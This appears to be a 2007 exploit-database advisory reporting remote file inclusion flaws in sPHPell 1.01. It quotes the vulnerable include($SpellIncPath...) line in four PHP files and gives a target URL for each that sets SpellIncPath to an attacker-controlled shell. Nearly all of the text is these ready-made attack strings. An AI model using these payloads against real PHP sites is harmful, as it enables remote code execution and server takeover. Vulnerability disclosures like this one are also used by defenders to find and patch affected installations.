[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-06-30
# Author : xoron
# Previous Title : XCMS 1.1 (Galerie.php) Local File Inclusion Vulnerabilities
# Next Title : Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability
sphpell - 1.01 Remote File Include
---------------------------------------------------------------------------------
Bulan: Cyber-security // Cyber-security.org
---------------------------------------------------------------------------------
script download:http://sourceforge.net/project/showfiles.php?group_id=82330
---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?
include($SpellIncPath."spellcheckvars.php");
BUG: www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?
include($SpellIncPath."spellcheckvars.php");
BUG: www.target.com/spellchecktext.php? SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?
include($SpellIncPath."spellcheckvars.php");
BUG: www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?
include($SpellIncPath."spellcheckvars.php");
BUG: www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
d0rk: :(
# www.Syue.com [2007-06-30]